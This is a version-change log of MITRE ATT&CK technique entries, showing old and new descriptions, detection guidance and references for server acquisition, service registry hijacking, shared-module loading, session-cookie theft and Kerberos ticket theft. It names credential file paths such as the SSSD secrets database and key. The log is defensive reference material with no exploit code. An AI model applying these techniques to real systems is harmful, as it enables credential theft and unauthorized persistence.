STIX FieldOld valueNew Value
modified2021-04-15 03:03:22.184000+00:002021-10-17 16:00:16.273000+00:00
x_mitre_detectionMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.Once adversaries have provisioned software on a compromised server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'ThreatConnect Infrastructure Dec 2020', 'description': 'ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.', 'url': 'https://threatconnect.com/blog/infrastructure-research-hunting/'}
external_references{'source_name': 'Mandiant SCANdalous Jul 2020', 'description': 'Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.', 'url': 'https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation'}
external_references{'source_name': 'Koczwara Beacon Hunting Sep 2021', 'description': 'Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.', 'url': 'https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2'}

[T1583.004] Acquire Infrastructure: Server

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Internet Scan: Response Metadata', 'Internet Scan: Response Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 02:51:18.167000+00:002021-10-17 15:39:45.736000+00:00
x_mitre_detectionMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.Once adversaries have provisioned a server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'ThreatConnect Infrastructure Dec 2020', 'description': 'ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.', 'url': 'https://threatconnect.com/blog/infrastructure-research-hunting/'}
external_references{'source_name': 'Mandiant SCANdalous Jul 2020', 'description': 'Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.', 'url': 'https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation'}
external_references{'source_name': 'Koczwara Beacon Hunting Sep 2021', 'description': 'Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.', 'url': 'https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2'}

[T1505] Server Software Component

Current version: 1.2

Version changed from: 1.1 → 1.2

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-09-16 19:34:19.961000+00:002021-10-18 17:05:44.743000+00:00
x_mitre_version1.11.2

[T1569.002] System Services: Service Execution

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may abuse the Windows service control manager tot1Adversaries may abuse the Windows service control manager to
> execute malicious commands or payloads. The Windows service> execute malicious commands or payloads. The Windows service
> control manager (<code>services.exe</code>) is an interface> control manager (<code>services.exe</code>) is an interface
> to manage and manipulate services.(Citation: Microsoft Serv> to manage and manipulate services.(Citation: Microsoft Serv
>ice Control Manager) The service control manager is accessib>ice Control Manager) The service control manager is accessib
>le to users via GUI components as well as system utilities s>le to users via GUI components as well as system utilities s
>uch as <code>sc.exe</code> and [Net](https://attack.mitre.or>uch as <code>sc.exe</code> and [Net](https://attack.mitre.or
>g/software/S0039).  [PsExec](https://attack.mitre.org/softwa>g/software/S0039).  [PsExec](https://attack.mitre.org/softwa
>re/S0029) can also be used to execute commands or payloads v>re/S0029) can also be used to execute commands or payloads v
>ia a temporary Windows service created through the service c>ia a temporary Windows service created through the service c
>ontrol manager API.(Citation: Russinovich Sysinternals)  Adv>ontrol manager API.(Citation: Russinovich Sysinternals) Tool
>ersaries may leverage these mechanisms to execute malicious >s such as [PsExec](https://attack.mitre.org/software/S0029) 
>content. This can be done by either executing a new or modif>and <code>sc.exe</code> can accept remote servers as argumen
>ied service. This technique is the execution used in conjunc>ts and may be used to conduct remote execution.  Adversaries
>tion with [Windows Service](https://attack.mitre.org/techniq> may leverage these mechanisms to execute malicious content.
>ues/T1543/003) during service persistence or privilege escal> This can be done by either executing a new or modified serv
>ation.>ice. This technique is the execution used in conjunction wit
 >h [Windows Service](https://attack.mitre.org/techniques/T154
 >3/003) during service persistence or privilege escalation.

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 18:52:02.384000+00:002021-08-30 17:42:40.945000+00:00
descriptionAdversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and [Net](https://attack.mitre.org/software/S0039). [PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and [Net](https://attack.mitre.org/software/S0039). [PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and sc.exe can accept remote servers as arguments and may be used to conduct remote execution. Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.
x_mitre_version1.01.1

[T1574.011] Hijack Execution Flow: Services Registry Permissions Weakness

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may execute their own malicious payloads by hijat1Adversaries may execute their own malicious payloads by hija
>cking the Registry entries used by services. Adversaries may>cking the Registry entries used by services. Adversaries may
> use flaws in the permissions for registry to redirect from > use flaws in the permissions for Registry keys related to s
>the originally specified executable to one that they control>ervices to redirect from the originally specified executable
>, in order to launch their own code at Service start.  Windo> to one that they control, in order to launch their own code
>ws stores local service configuration information in the Reg> when a service starts. Windows stores local service configu
>istry under <code>HKLM\SYSTEM\CurrentControlSet\Services</co>ration information in the Registry under <code>HKLM\SYSTEM\C
>de>. The information stored under a service's Registry keys >urrentControlSet\Services</code>. The information stored und
>can be manipulated to modify a service's execution parameter>er a service's Registry keys can be manipulated to modify a 
>s through tools such as the service controller, sc.exe,  [Po>service's execution parameters through tools such as the ser
>werShell](https://attack.mitre.org/techniques/T1059/001), or>vice controller, sc.exe,  [PowerShell](https://attack.mitre.
> [Reg](https://attack.mitre.org/software/S0075). Access to R>org/techniques/T1059/001), or [Reg](https://attack.mitre.org
>egistry keys is controlled through Access Control Lists and >/software/S0075). Access to Registry keys is controlled thro
>permissions. (Citation: Registry Key Security)  If the permi>ugh access control lists and user permissions. (Citation: Re
>ssions for users and groups are not properly set and allow a>gistry Key Security)(Citation: malware_hides_service)  If th
>ccess to the Registry keys for a service, then adversaries c>e permissions for users and groups are not properly set and 
>an change the service binPath/ImagePath to point to a differ>allow access to the Registry keys for a service, adversaries
>ent executable under their control. When the service starts > may change the service's binPath/ImagePath to point to a di
>or is restarted, then the adversary-controlled program will >fferent executable under their control. When the service sta
>execute, allowing the adversary to gain persistence and/or p>rts or is restarted, then the adversary-controlled program w
>rivilege escalation to the account context the service is se>ill execute, allowing the adversary to establish persistence
>t to execute under (local/domain account, SYSTEM, LocalServi> and/or privilege escalation to the account context the serv
>ce, or NetworkService).  Adversaries may also alter Registry>ice is set to execute under (local/domain account, SYSTEM, L
> keys associated with service failure parameters (such as <c>ocalService, or NetworkService).  Adversaries may also alter
>ode>FailureCommand</code>) that may be executed in an elevat> other Registry keys in the service’s Registry tree. For exa
>ed context anytime the service fails or is intentionally cor>mple, the <code>FailureCommand</code> key may be changed so 
>rupted.(Citation: Kansa Service related collectors)(Citation>that the service is executed in an elevated context anytime 
>: Tweet Registry Perms Weakness) >the service fails or is intentionally corrupted.(Citation: K
 >ansa Service related collectors)(Citation: Tweet Registry Pe
 >rms Weakness)  The <code>Performance</code> key contains the
 > name of a driver service's performance DLL and the names of
 > several exported functions in the DLL.(Citation: microsoft_
 >services_registry_tree) If the <code>Performance</code> key 
 >is not already present and if an adversary-controlled user h
 >as the <code>Create Subkey</code> permission, adversaries ma
 >y create the <code>Performance</code> key in the service’s R
 >egistry tree to point to a malicious DLL.(Citation: insecure
 >_reg_perms)  Adversaries may also add the <code>Parameters</
 >code> key, which stores driver-specific data, or other custo
 >m subkeys for their malicious services to establish persiste
 >nce or enable other malicious activities.(Citation: microsof
 >t_services_registry_tree)(Citation: troj_zegost) Additionall
 >y, If adversaries launch their malicious services using svch
 >ost.exe, the service’s file may be identified using <code>HK
 >EY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicena
 >me\Parameters\ServiceDll</code>.(Citation: malware_hides_ser
 >vice)

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-09-16 19:07:48.590000+00:002021-10-14 23:52:52.058000+00:00
descriptionAdversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through Access Control Lists and permissions. (Citation: Registry Key Security) If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, then adversaries can change the service binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Adversaries may also alter Registry keys associated with service failure parameters (such as FailureCommand) that may be executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness) Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service) If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Adversaries may also alter other Registry keys in the service’s Registry tree. For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness) The Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms) Adversaries may also add the Parameters key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, If adversaries launch their malicious services using svchost.exe, the service’s file may be identified using HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename\Parameters\ServiceDll.(Citation: malware_hides_service)
external_references[3]['source_name']Kansa Service related collectorsmalware_hides_service
external_references[3]['description']Hull, D.. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019.Lawrence Abrams. (2004, September 10). How Malware hides and is installed as a Service. Retrieved August 30, 2021.
external_references[3]['url']https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.htmlhttps://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/
external_references[4]['source_name']Tweet Registry Perms WeaknessKansa Service related collectors
external_references[4]['description']@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018.Hull, D.. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019.
external_references[4]['url']https://twitter.com/r0wdy_/status/936365549553991680https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html
external_references[5]['source_name']Autoruns for WindowsTweet Registry Perms Weakness
external_references[5]['description']Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020.@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018.
external_references[5]['url']https://docs.microsoft.com/en-us/sysinternals/downloads/autorunshttps://twitter.com/r0wdy_/status/936365549553991680
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'microsoft_services_registry_tree', 'description': 'Microsoft. (2021, August 5). HKLM\\SYSTEM\\CurrentControlSet\\Services Registry Tree. Retrieved August 25, 2021.', 'url': 'https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree'}
external_references{'source_name': 'insecure_reg_perms', 'description': 'Clément Labro. (2020, November 12). Windows RpcEptMapper Service Insecure Registry Permissions EoP. Retrieved August 25, 2021.', 'url': 'https://itm4n.github.io/windows-registry-rpceptmapper-eop/'}
external_references{'source_name': 'troj_zegost', 'description': 'Trend Micro. (2012, October 9). TROJ_ZEGOST. Retrieved September 2, 2021.', 'url': 'https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost'}
external_references{'source_name': 'Autoruns for Windows', 'description': 'Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020.', 'url': 'https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns'}

[T1129] Shared Modules

Current version: 2.1

Version changed from: 2.0 → 2.1


Old Description
New Description
t1Adversaries may abuse shared modules to execute malicious pat1Adversaries may execute malicious payloads via loading share
>yloads. The Windows module loader can be instructed to load >d modules. The Windows module loader can be instructed to lo
>DLLs from arbitrary local paths and arbitrary Universal Nami>ad DLLs from arbitrary local paths and arbitrary Universal N
>ng Convention (UNC) network paths. This functionality reside>aming Convention (UNC) network paths. This functionality res
>s in NTDLL.dll and is part of the Windows [Native API](https>ides in NTDLL.dll and is part of the Windows [Native API](ht
>://attack.mitre.org/techniques/T1106) which is called from f>tps://attack.mitre.org/techniques/T1106) which is called fro
>unctions like <code>CreateProcess</code>, <code>LoadLibrary<>m functions like <code>CreateProcess</code>, <code>LoadLibra
>/code>, etc. of the Win32 API. (Citation: Wikipedia Windows >ry</code>, etc. of the Win32 API. (Citation: Wikipedia Windo
>Library Files)  The module loader can load DLLs:  * via spec>ws Library Files)  The module loader can load DLLs:  * via s
>ification of the (fully-qualified or relative) DLL pathname >pecification of the (fully-qualified or relative) DLL pathna
>in the IMPORT directory;      * via EXPORT forwarded to anot>me in the IMPORT directory;      * via EXPORT forwarded to a
>her DLL, specified with (fully-qualified or relative) pathna>nother DLL, specified with (fully-qualified or relative) pat
>me (but without extension);      * via an NTFS junction or s>hname (but without extension);      * via an NTFS junction o
>ymlink program.exe.local with the fully-qualified or relativ>r symlink program.exe.local with the fully-qualified or rela
>e pathname of a directory containing the DLLs specified in t>tive pathname of a directory containing the DLLs specified i
>he IMPORT directory or forwarded EXPORTs;      * via <code>&>n the IMPORT directory or forwarded EXPORTs;      * via <cod
>#x3c;file name="filename.extension" loadFrom="fully-qualifie>e>&#x3c;file name="filename.extension" loadFrom="fully-quali
>d or relative pathname"&#x3e;</code> in an embedded or exter>fied or relative pathname"&#x3e;</code> in an embedded or ex
>nal "application manifest". The file name refers to an entry>ternal "application manifest". The file name refers to an en
> in the IMPORT directory or a forwarded EXPORT.  Adversaries>try in the IMPORT directory or a forwarded EXPORT.  Adversar
> may use this functionality as a way to execute arbitrary co>ies may use this functionality as a way to execute arbitrary
>de on a victim system. For example, malware may execute shar> payloads on a victim system. For example, malware may execu
>e modules to load additional components or features.>te share modules to load additional components or features.

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 18:14:36.980000+00:002021-10-15 13:48:02.963000+00:00
descriptionAdversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API. (Citation: Wikipedia Windows Library Files) The module loader can load DLLs: * via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory; * via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension); * via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs; * via <file name="filename.extension" loadFrom="fully-qualified or relative pathname"> in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT. Adversaries may use this functionality as a way to execute arbitrary code on a victim system. For example, malware may execute share modules to load additional components or features.Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API. (Citation: Wikipedia Windows Library Files) The module loader can load DLLs: * via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory; * via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension); * via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs; * via <file name="filename.extension" loadFrom="fully-qualified or relative pathname"> in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT. Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute share modules to load additional components or features.
x_mitre_version2.02.1

[T1585.001] Establish Accounts: Social Media Accounts

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Persona: Social Media', 'Network Traffic: Network Traffic Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:10:35.708000+00:002021-10-16 17:37:34.563000+00:00
x_mitre_version1.01.1

[T1586.001] Compromise Accounts: Social Media Accounts

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Persona: Social Media', 'Network Traffic: Network Traffic Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 02:59:06.872000+00:002021-10-16 17:15:12.169000+00:00
x_mitre_version1.01.1

[T1592.002] Gather Victim Host Information: Software

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Internet Scan: Response Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:23:57.876000+00:002021-10-17 16:33:19.596000+00:00
x_mitre_detectionMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.Internet scanners may be used to look for patterns associated with malicious content designed to collect host software information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox) Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'ThreatConnect Infrastructure Dec 2020', 'description': 'ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.', 'url': 'https://threatconnect.com/blog/infrastructure-research-hunting/'}

[T1027.002] Obfuscated Files or Information: Software Packing

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-02-05 20:05:41.548000+00:002021-10-15 13:56:47.154000+00:00
x_mitre_version1.01.1
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Content

[T1566.001] Phishing: Spearphishing Attachment

Current version: 2.2

Version changed from: 2.1 → 2.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-01 16:21:17.553000+00:002021-10-18 17:39:12.452000+00:00
x_mitre_version2.12.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Creation

[T1608] Stage Capabilities

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Internet Scan: Response Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-27 19:01:22.653000+00:002021-10-17 16:28:41.815000+00:00
x_mitre_detectionMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as initial access and post-compromise behaviors.If infrastructure or patterns in malware, tooling, certificates, or malicious web content have been previously identified, internet scanning may uncover when an adversary has staged their capabilities. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as initial access and post-compromise behaviors.
x_mitre_version1.01.1

[T1539] Steal Web Session Cookie

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1An adversary may steal web application or service session cot1An adversary may steal web application or service session co
>okies and use them to gain access to web applications or Int>okies and use them to gain access to web applications or Int
>ernet services as an authenticated user without needing cred>ernet services as an authenticated user without needing cred
>entials. Web applications and services often use session coo>entials. Web applications and services often use session coo
>kies as an authentication token after a user has authenticat>kies as an authentication token after a user has authenticat
>ed to a website.  Cookies are often valid for an extended pe>ed to a website.  Cookies are often valid for an extended pe
>riod of time, even if the web application is not actively us>riod of time, even if the web application is not actively us
>ed. Cookies can be found on disk, in the process memory of t>ed. Cookies can be found on disk, in the process memory of t
>he browser, and in network traffic to remote systems. Additi>he browser, and in network traffic to remote systems. Additi
>onally, other applications on the targets machine might stor>onally, other applications on the targets machine might stor
>e sensitive authentication cookies in memory (e.g. apps whic>e sensitive authentication cookies in memory (e.g. apps whic
>h authenticate to cloud services). Session cookies can be us>h authenticate to cloud services). Session cookies can be us
>ed to bypasses some multi-factor authentication protocols.(C>ed to bypasses some multi-factor authentication protocols.(C
>itation: Pass The Cookie)  There are several examples of mal>itation: Pass The Cookie)  There are several examples of mal
>ware targeting cookies from web browsers on the local system>ware targeting cookies from web browsers on the local system
>.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42>.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42
> Mac Crypto Cookies January 2019) There are also open source> Mac Crypto Cookies January 2019) There are also open source
> frameworks such as Evilginx 2 and Muraena that can gather s> frameworks such as Evilginx 2 and Muraena that can gather s
>ession cookies through a man-in-the-middle proxy that can be>ession cookies through a malicious proxy (ex: [Adversary-in-
> set up by an adversary and used in phishing campaigns.(Cita>the-Middle](https://attack.mitre.org/techniques/T1557)) that
>tion: Github evilginx2)(Citation: GitHub Mauraena)  After an> can be set up by an adversary and used in phishing campaign
> adversary acquires a valid cookie, they can then perform a >s.(Citation: Github evilginx2)(Citation: GitHub Mauraena)  A
>[Web Session Cookie](https://attack.mitre.org/techniques/T15>fter an adversary acquires a valid cookie, they can then per
>50/004) technique to login to the corresponding web applicat>form a [Web Session Cookie](https://attack.mitre.org/techniq
>ion.>ues/T1550/004) technique to login to the corresponding web a
 >pplication.

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 17:57:07.903000+00:002021-07-28 01:26:51.971000+00:00
descriptionAn adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website. Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie) There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a man-in-the-middle proxy that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena) After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website. Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie) There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a malicious proxy (ex: [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena) After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.
x_mitre_version1.11.2

[T1558] Steal or Forge Kerberos Tickets

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may attempt to subvert Kerberos authentication bt1Adversaries may attempt to subvert Kerberos authentication b
>y stealing or forging Kerberos tickets to enable [Pass the T>y stealing or forging Kerberos tickets to enable [Pass the T
>icket](https://attack.mitre.org/techniques/T1550/003).   Ker>icket](https://attack.mitre.org/techniques/T1550/003). Kerbe
>beros is an authentication protocol widely used in modern Wi>ros is an authentication protocol widely used in modern Wind
>ndows domain environments. In Kerberos environments, referre>ows domain environments. In Kerberos environments, referred 
>d to as “realms”, there are three basic participants: client>to as “realms”, there are three basic participants: client, 
>, service, and Key Distribution Center (KDC).(Citation: ADSe>service, and Key Distribution Center (KDC).(Citation: ADSecu
>curity Kerberos Ring Decoder) Clients request access to a se>rity Kerberos Ring Decoder) Clients request access to a serv
>rvice and through the exchange of Kerberos tickets, originat>ice and through the exchange of Kerberos tickets, originatin
>ing from KDC, they are granted access after having successfu>g from KDC, they are granted access after having successfull
>lly authenticated. The KDC is responsible for both authentic>y authenticated. The KDC is responsible for both authenticat
>ation and ticket granting.  Attackers may attempt to abuse K>ion and ticket granting.  Attackers may attempt to abuse Ker
>erberos by stealing tickets or forging tickets to enable una>beros by stealing tickets or forging tickets to enable unaut
>uthorized access.>horized access.  On Windows, the built-in <code>klist</code>
 > utility can be used to list and analyze cached Kerberos tic
 >kets.(Citation: Microsoft Klist)  Linux systems on Active Di
 >rectory domains store Kerberos credentials locally in the cr
 >edential cache file referred to as the "ccache". The credent
 >ials are stored in the ccache file while they remain valid a
 >nd generally while a user's session lasts.(Citation: MIT cca
 >che) On modern Redhat Enterprise Linux systems, and derivati
 >ve distributions, the System Security Services Daemon (SSSD)
 > handles Kerberos tickets. By default SSSD maintains a copy 
 >of the ticket database that can be found in <code>/var/lib/s
 >ss/secrets/secrets.ldb</code> as well as the corresponding k
 >ey located in <code>/var/lib/sss/secrets/.secrets.mkey</code
 >>. Both files require root access to read. If an adversary i
 >s able to access the database and key, the credential cache 
 >Kerberos blob can be extracted and converted into a usable K
 >erberos ccache file that adversaries may use for [Pass the T
 >icket](https://attack.mitre.org/techniques/T1550/003). The c
 >cache file may also be converted into a Windows format using
 > tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Cita
 >tion: Brining MimiKatz to Unix)(Citation: Kekeo)   Kerberos 
 >tickets on macOS are stored in a standard ccache format, sim
 >ilar to Linux. By default, access to these ccache entries is
 > federated through the KCM daemon process via the Mach RPC p
